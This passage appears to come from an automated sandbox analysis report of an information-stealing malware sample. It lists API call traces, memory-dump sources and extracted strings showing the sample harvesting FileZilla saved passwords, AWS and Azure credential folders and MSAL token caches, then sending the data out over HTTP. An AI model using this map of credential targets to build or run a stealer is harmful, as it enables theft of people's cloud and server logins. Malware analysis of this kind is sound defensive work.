                                                  • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                                  • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                                  • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                                  • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                                  • strtok_s.MSVCRT ref: 00410679
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                                  • memset.MSVCRT ref: 004106DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                  • API String ID: 337689325-514892060
                                                  • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                  • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                  • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                  • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                                  APIs
                                                  • lstrlen.KERNEL32(00424DA0), ref: 00B34833
                                                  • lstrlen.KERNEL32(00424E50), ref: 00B3483E
                                                  • lstrlen.KERNEL32(00424F18), ref: 00B34849
                                                  • lstrlen.KERNEL32(00424FD0), ref: 00B34854
                                                  • lstrlen.KERNEL32(00425078), ref: 00B3485F
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B3486E
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B34875
                                                  • lstrlen.KERNEL32(00425120), ref: 00B34883
                                                  • lstrlen.KERNEL32(004251C8), ref: 00B3488E
                                                  • lstrlen.KERNEL32(00425270), ref: 00B34899
                                                  • lstrlen.KERNEL32(00425318), ref: 00B348A4
                                                  • lstrlen.KERNEL32(004253C0), ref: 00B348AF
                                                  • lstrlen.KERNEL32(00425468), ref: 00B348C3
                                                  • lstrlen.KERNEL32(00425510), ref: 00B348CE
                                                  • lstrlen.KERNEL32(004255B8), ref: 00B348D9
                                                  • lstrlen.KERNEL32(00425660), ref: 00B348E4
                                                  • lstrlen.KERNEL32(00425708), ref: 00B348EF
                                                  • lstrlen.KERNEL32(004257B0), ref: 00B34918
                                                  • lstrlen.KERNEL32(00425858), ref: 00B34923
                                                  • lstrlen.KERNEL32(00425920), ref: 00B3492E
                                                  • lstrlen.KERNEL32(004259C8), ref: 00B34939
                                                  • lstrlen.KERNEL32(00425A70), ref: 00B34944
                                                  • strlen.MSVCRT ref: 00B34957
                                                  • lstrlen.KERNEL32(00425B18), ref: 00B3497F
                                                  • lstrlen.KERNEL32(00425BC0), ref: 00B3498A
                                                  • lstrlen.KERNEL32(00425C68), ref: 00B34995
                                                  • lstrlen.KERNEL32(00425D10), ref: 00B349A0
                                                  • lstrlen.KERNEL32(00425DB8), ref: 00B349AB
                                                  • lstrlen.KERNEL32(00425E60), ref: 00B349BB
                                                  • lstrlen.KERNEL32(00425F08), ref: 00B349C6
                                                  • lstrlen.KERNEL32(00425FB0), ref: 00B349D1
                                                  • lstrlen.KERNEL32(00426058), ref: 00B349DC
                                                  • lstrlen.KERNEL32(00426100), ref: 00B349E7
                                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00B34A03
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                  • String ID:
                                                  • API String ID: 2127927946-0
                                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction ID: c00f5fb3c93e718752c1834f2426f5eb4240e47b3e28a36181c2ae4ca00d9b12
                                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction Fuzzy Hash: CE41A879740624EBC718AFE5FC89B987F71AB4C712BA0C062F90299190CBB5D5119B3E
                                                  APIs
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00B49B08
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00B49B21
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00B49B39
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00B49B51
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00B49B6A
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00B49B82
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00B49B9A
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00B49BB3
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00B49BCB
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00B49BE3
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00B49BFC
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00B49C14
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00B49C2C
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00B49C45
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 00B49C5D
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 00B49C75
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 00B49C8E
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 00B49CA6
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 00B49CBE
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 00B49CD7
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 00B49CEF
                                                  • LoadLibraryA.KERNEL32(0064A550,?,00B46C67), ref: 00B49D01
                                                  • LoadLibraryA.KERNEL32(0064A17C,?,00B46C67), ref: 00B49D12
                                                  • LoadLibraryA.KERNEL32(0064A104,?,00B46C67), ref: 00B49D24
                                                  • LoadLibraryA.KERNEL32(0064A1DC,?,00B46C67), ref: 00B49D36
                                                  • LoadLibraryA.KERNEL32(0064A328,?,00B46C67), ref: 00B49D47
                                                  • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 00B49D69
                                                  • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 00B49D8A
                                                  • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 00B49DA2
                                                  • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 00B49DC4
                                                  • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 00B49DE5
                                                  • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 00B49E06
                                                  • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 00B49E1D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID:
                                                  • API String ID: 2238633743-0
                                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction ID: b62f46b4d6316664c0394fa9a8f6ed7a2b9202156d1dd37cf09fc2aff1923fbd
                                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction Fuzzy Hash: 3CA13BBD5C0240BFE364EFE8ED889A63BFBF74E301714661AE605C3264D6399841DB52
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B49047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B49072
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B4AA4D
                                                    • Part of subcall function 00B39C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B39C53
                                                    • Part of subcall function 00B39C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B39C78
                                                    • Part of subcall function 00B39C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B39C98
                                                    • Part of subcall function 00B39C27: ReadFile.KERNEL32(000000FF,?,00000000,00B316F6,00000000), ref: 00B39CC1
                                                    • Part of subcall function 00B39C27: LocalFree.KERNEL32(00B316F6), ref: 00B39CF7
                                                    • Part of subcall function 00B39C27: CloseHandle.KERNEL32(000000FF), ref: 00B39D01
                                                    • Part of subcall function 00B49097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B490B9
                                                  • strtok_s.MSVCRT ref: 00B40582
                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00B405C9
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B405D0
                                                  • StrStrA.SHLWAPI(00000000,00421618), ref: 00B405EC
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B405FA
                                                    • Part of subcall function 00B48B47: malloc.MSVCRT ref: 00B48B4F
                                                    • Part of subcall function 00B48B47: strncpy.MSVCRT ref: 00B48B6A
                                                  • StrStrA.SHLWAPI(00000000,00421620), ref: 00B40636
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B40644
                                                  • StrStrA.SHLWAPI(00000000,00421628), ref: 00B40680
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B4068E
                                                  • StrStrA.SHLWAPI(00000000,00421630), ref: 00B406CA
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B406DC
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B40769
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B40781
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B40799
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B407B1
                                                  • lstrcat.KERNEL32(?,0042164C), ref: 00B407C9
                                                  • lstrcat.KERNEL32(?,00421660), ref: 00B407D8
                                                  • lstrcat.KERNEL32(?,00421670), ref: 00B407E7
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B407FA
                                                  • lstrcat.KERNEL32(?,00421678), ref: 00B40809
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B4081C
                                                  • lstrcat.KERNEL32(?,0042167C), ref: 00B4082B
                                                  • lstrcat.KERNEL32(?,00421680), ref: 00B4083A
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B4084D
                                                  • lstrcat.KERNEL32(?,00421688), ref: 00B4085C
                                                  • lstrcat.KERNEL32(?,0042168C), ref: 00B4086B
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B4087E
                                                  • lstrcat.KERNEL32(?,00421698), ref: 00B4088D
                                                  • lstrcat.KERNEL32(?,0042169C), ref: 00B4089C
                                                  • strtok_s.MSVCRT ref: 00B408E0
                                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B408F5
                                                  • memset.MSVCRT ref: 00B40944
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                  • String ID:
                                                  • API String ID: 3689735781-0
                                                  • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                  • Instruction ID: 779ba8a6ae5ca0b56d95177c71186d1023604bfbb1ab11ce42db1498c663f3f5
                                                  • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                  • Instruction Fuzzy Hash: BCD15FB5A90208ABCB04FBF4DD86EEEB7B9EF14700F504598F102B6091DE74AB05DB61
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                                  • StrCmpCA.SHLWAPI(?,0087B030), ref: 00405A13
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0087AF30,00000000,?,00844960,00000000,?,00421A1C), ref: 00405E71
                                                  • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                                  • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                  • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                                  • memcpy.MSVCRT(?), ref: 00405EFE
                                                  • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                                  • HttpOpenRequestA.WININET(00000000,0087AF20,?,0087A1B8,00000000,00000000,00400100,00000000), ref: 00405BF8
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                  • String ID: "$"$------$------$------
                                                  • API String ID: 1406981993-2180234286
                                                  • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                  • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                  • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                  • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                  APIs
                                                  • memset.MSVCRT ref: 00414D87
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                                  • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                  • memset.MSVCRT ref: 00414E13
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                                  • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                  • memset.MSVCRT ref: 00414E9F
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                                  • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0087B020,?,000003E8), ref: 00414A4A
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                  • memset.MSVCRT ref: 00414F2B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                  • API String ID: 4017274736-156832076
                                                  • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                  • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                                  • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                  • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                    • Part of subcall function 00B48DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B31660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B48DED
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B3D1EA
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B3D32E
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B3D335
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B3D46F
                                                  • lstrcat.KERNEL32(?,00421478), ref: 00B3D47E
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B3D491
                                                  • lstrcat.KERNEL32(?,0042147C), ref: 00B3D4A0
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B3D4B3
                                                  • lstrcat.KERNEL32(?,00421480), ref: 00B3D4C2
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B3D4D5
                                                  • lstrcat.KERNEL32(?,00421484), ref: 00B3D4E4
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B3D4F7
                                                  • lstrcat.KERNEL32(?,00421488), ref: 00B3D506
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B3D519
                                                  • lstrcat.KERNEL32(?,0042148C), ref: 00B3D528
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B3D53B
                                                  • lstrcat.KERNEL32(?,00421490), ref: 00B3D54A
                                                    • Part of subcall function 00B4AA87: lstrlen.KERNEL32(00B3516C,?,?,00B3516C,00420DDE), ref: 00B4AA92
                                                    • Part of subcall function 00B4AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B4AAEC
                                                  • lstrlen.KERNEL32(?), ref: 00B3D591
                                                  • lstrlen.KERNEL32(?), ref: 00B3D5A0
                                                  • memset.MSVCRT ref: 00B3D5EF
                                                    • Part of subcall function 00B4ACD7: StrCmpCA.SHLWAPI(0064A350,00B3AA0E,?,00B3AA0E,0064A350), ref: 00B4ACF6
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B3D61B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                  • String ID:
                                                  • API String ID: 1973479514-0
                                                  • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                  • Instruction ID: eb1c6bb9ae75e6d614566420c89afdcf51120d82d6b2fedb54f06904309a3b69
                                                  • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                  • Instruction Fuzzy Hash: 3CE14DB5990108ABCB08FBE4DD96EEE73B9EF14701F504199F106A60A1DE34AF05DF62
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00844840,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                                  • lstrcatA.KERNEL32(?,00000000,00849B08,00421474,00849B08,00421470,00000000), ref: 0040D208
                                                  • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                                  • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                                  • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                                  • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                                  • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                                  • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                                  • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00849958,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
